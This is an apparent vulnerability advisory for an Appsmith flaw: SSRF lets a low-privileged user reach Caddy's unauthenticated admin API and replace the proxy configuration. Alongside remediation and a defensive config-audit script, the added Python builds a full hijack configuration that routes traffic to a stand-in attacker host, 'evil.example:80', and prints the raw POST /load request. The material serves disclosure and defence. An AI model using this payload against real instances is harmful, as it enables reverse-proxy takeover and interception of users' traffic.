
Appsmith EUVD-2026-39118 | CVE-2026-55454 CRITICAL
Exposed Dangerous Method or Function (CWE-749)
Published 2026-06-24 · GitHub_M
CVSS 3.1 base score 9.9 · Vendor: GitHub_M

Severity by source

Vendor (GitHub_M), primary: 9.9 CRITICAL
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

vuln.today AI: 9.9 CRITICAL
A low-privileged authenticated user (PR:L) drives an SSRF over the network (AV:N/AC:L); the resulting reverse-proxy takeover is a scope change (S:C) with full C/I/A compromise of the traffic the proxy fronts.
CVSS 3.1: AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
CVSS 4.0: AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H

Primary rating from Vendor (GitHub_M).

CVSS Vector (Vendor: GitHub_M)

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
Attack Vector: Network
Attack Complexity: Low
Privileges Required: Low
User Interaction: None
Scope: Changed
Confidentiality: High
Integrity: High
Availability: High

Lifecycle Timeline (3 events)

Patch available: Jun 24, 2026 - 23:03 (EUVD)
Analysis Generated: Jun 24, 2026 - 22:25 (vuln.today)
CVE Published: Jun 24, 2026 - 21:38 (cve.org)

Description (CVE.org)

Appsmith is a platform to build admin panels, internal tools, and dashboards. Prior to 2.1, the bundled Caddy reverse proxy's admin API, which has no authentication by default, is bound on 0.0.0.0:2019 inside the container. While this listener is not directly published to the host by docker-compose.yml, it is reachable from the Appsmith server process itself, or via an SSRF vulnerability. An authenticated low-privileged user can therefore drive the SSRF to issue POST /load (or any other admin-API call) against http://0.0.0.0:2019/, fully replacing the live Caddy configuration and taking over the reverse proxy. This vulnerability is fixed in 2.1.

Analysis (AI)

Reverse-proxy takeover in Appsmith versions prior to 2.1 lets an authenticated low-privileged user abuse server-side request forgery to reach the bundled Caddy admin API, which ships with no authentication and listens on 0.0.0.0:2019 inside the container. By forcing the Appsmith server to issue a POST /load to that internal endpoint, the attacker rewrites the live Caddy configuration and seizes control of the reverse proxy that fronts the application. …


Attack Chain (AI-derived)

Hypothetical attack flow derived from CVE metadata:

Access: authenticate as a low-privileged Appsmith user.
Delivery: configure a data source or REST API action whose target is http://0.0.0.0:2019/ inside the container.
Exploit: drive the SSRF so that the Appsmith server process sends POST /load, carrying an attacker-chosen JSON configuration, to the unauthenticated Caddy admin API.
Execution: Caddy replaces its live configuration with the attacker's.
Impact: the reverse proxy is taken over; traffic to the instance can be intercepted or redirected.

Vulnerability Assessment (AI)

Exploitation: requires an authenticated low-privileged Appsmith account (CVSS PR:L) on a version prior to 2.1 deployed from the bundled Docker image, where Caddy's admin API is bound to 0.0.0.0:2019, plus a usable SSRF primitive that makes the Appsmith server process issue requests to that in-container endpoint (e.g., a data-source or outbound-request feature). Because the admin API carries no authentication, a request that reaches it is sufficient on its own; no credential for Caddy is needed. …
Risk Assessment: the published CVSS:3.1 vector (AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H = 9.9) reflects a network-reachable, low-complexity attack needing only low privileges, with a scope change because compromising Caddy affects everything the proxy fronts, not just the vulnerable Appsmith backend. …
Exploit Scenario: a low-privileged user logs into a self-hosted Appsmith instance and configures a data source or REST API action targeting http://0.0.0.0:2019/load, then triggers the server to send a POST whose body is an attacker-chosen, complete Caddy JSON configuration. Caddy accepts the unauthenticated request and applies the new configuration, handing the attacker control of the reverse proxy: they can redirect or intercept all traffic through it and serve malicious content to its users. …
Remediation: upgrade to Appsmith 2.1 or later, the vendor-released fix for the exposed Caddy admin API (see GHSA-8jvv-gwqg-6vjc at https://github.com/appsmithorg/appsmith/security/advisories/GHSA-8jvv-gwqg-6vjc). …

Recommended Action (AI)

24 hours: inventory all Appsmith instances and confirm their versions; log Caddy configuration changes and connections to port 2019. Note that restricting network egress from the container does not help here: the admin listener sits inside the same container as the server process that issues the SSRF, so the request never leaves the container. Where the deployment lets you control the Caddy configuration, the compensating control until the upgrade is to disable the admin API (Caddyfile global option `admin off`, or `"admin": {"disabled": true}` in JSON), accepting that `caddy reload` then no longer works and configuration changes need a process restart. …
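The following Python is an added example, not Appsmith's or Caddy's own code and not taken from this advisory. It serves the attack chain and exploit scenario above (it builds the complete Caddy JSON configuration an attacker would push with POST /load, and the raw HTTP request the SSRF must produce) and the remediation (it audits a Caddy config, such as the output of GET /config/, for the exposed-admin condition, and shows the hardened admin stanza). Assumptions: the JSON shapes follow Caddy's documented config schema (top-level "admin" with disabled/listen/enforce_origin; apps.http.servers.<name>.routes[].handle[] with handler "reverse_proxy"); the server name `srv0`, the backend `localhost:8080` and the attacker upstream `evil.example:80` are constructed placeholders; `0.0.0.0:2019` is the address from the description.

```python
"""Caddy admin-API exposure: audit a config, and see what a hostile POST /load
would replace it with. Added example; shapes follow Caddy's JSON config schema."""
import ipaddress
import json

DEFAULT_ADMIN_LISTEN = "localhost:2019"  # Caddy's default when "listen" is unset


def _binds_all_interfaces(listen: str) -> bool:
    """True when the admin listener is reachable from every interface in its
    network namespace rather than only loopback."""
    if listen.startswith("unix/"):
        return False                      # unix socket: no TCP reachability at all
    host, _, _port = listen.rpartition(":")
    host = host.strip("[]")               # "[::1]:2019" -> "::1"
    if host in ("", "0.0.0.0", "::"):
        return True                       # empty or wildcard host binds everything
    if host == "localhost":
        return False
    try:
        return not ipaddress.ip_address(host).is_loopback
    except ValueError:
        return True                       # unresolved hostname: assume not loopback


def admin_findings(config: dict) -> list[str]:
    """Why the admin API in this config is usable by an SSRF from a process in
    the same container. An empty list means the admin API is off."""
    admin = config.get("admin") or {}
    if admin.get("disabled"):
        return []
    listen = admin.get("listen") or DEFAULT_ADMIN_LISTEN
    findings = [f"admin API enabled on {listen}: it has no authentication, so any "
                "process that can open a TCP connection to it can POST /load"]
    if _binds_all_interfaces(listen):
        findings.append(f"{listen} is not loopback-only: other containers or hosts "
                        "on the same network can reach it too")
    if not admin.get("enforce_origin"):
        findings.append("enforce_origin is false: a request with no Origin header, "
                        "as a server-side HTTP client sends, is accepted")
    return findings


def hijack_payload(attacker_upstream: str) -> dict:
    """Constructed example of a POST /load body: a complete config whose only
    route proxies every request to an attacker-controlled upstream."""
    return {
        "admin": {"listen": "0.0.0.0:2019"},      # keep the door open for re-loads
        "apps": {"http": {"servers": {"srv0": {
            "listen": [":80"],
            "routes": [{"handle": [{"handler": "reverse_proxy",
                                    "upstreams": [{"dial": attacker_upstream}]}]}],
        }}}},
    }


def load_request(config: dict, host: str = "0.0.0.0:2019") -> bytes:
    """Raw HTTP the SSRF must emit. Caddy rejects admin requests whose Host header
    is not an allowed origin, and by default the allowed origins derive from the
    listen address, hence the literal 0.0.0.0:2019 in the description."""
    body = json.dumps(config, separators=(",", ":")).encode()
    head = (f"POST /load HTTP/1.1\r\nHost: {host}\r\n"
            "Content-Type: application/json\r\n"
            f"Content-Length: {len(body)}\r\n\r\n")
    return head.encode() + body


def upstreams(config: dict) -> list[str]:
    """Every reverse_proxy dial target in the config: where user traffic goes."""
    out = []
    for server in config.get("apps", {}).get("http", {}).get("servers", {}).values():
        for route in server.get("routes", []):
            for handler in route.get("handle", []):
                if handler.get("handler") == "reverse_proxy":
                    out += [u["dial"] for u in handler.get("upstreams", [])]
    return out


# Constructed stand-in for a pre-2.1 bundled config: admin on all interfaces,
# application traffic proxied to the local backend.
EXPOSED = {
    "admin": {"listen": "0.0.0.0:2019"},
    "apps": {"http": {"servers": {"srv0": {
        "listen": [":80"],
        "routes": [{"handle": [{"handler": "reverse_proxy",
                                "upstreams": [{"dial": "localhost:8080"}]}]}],
    }}}},
}

# Hardened variant: admin API off entirely. Re-binding to loopback alone would not
# close the in-container SSRF path, because the app server shares that loopback.
HARDENED = {**EXPOSED, "admin": {"disabled": True}}

if __name__ == "__main__":
    for finding in admin_findings(EXPOSED):
        print("-", finding)
    print("hardened:", admin_findings(HARDENED))
    print("after hijack, traffic goes to:", upstreams(hijack_payload("evil.example:80")))
    print(load_request(hijack_payload("evil.example:80")).decode().split("\r\n\r\n")[0])
```

To check a running instance from a shell inside the container, `curl -s http://0.0.0.0:2019/config/` returning the JSON configuration (HTTP 200) confirms the condition; that JSON can be fed to `admin_findings` as-is. `enforce_origin` is only a partial control when the SSRF primitive lets the user set request headers, which is why the audit treats an enabled admin API as the primary finding regardless of the other settings.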
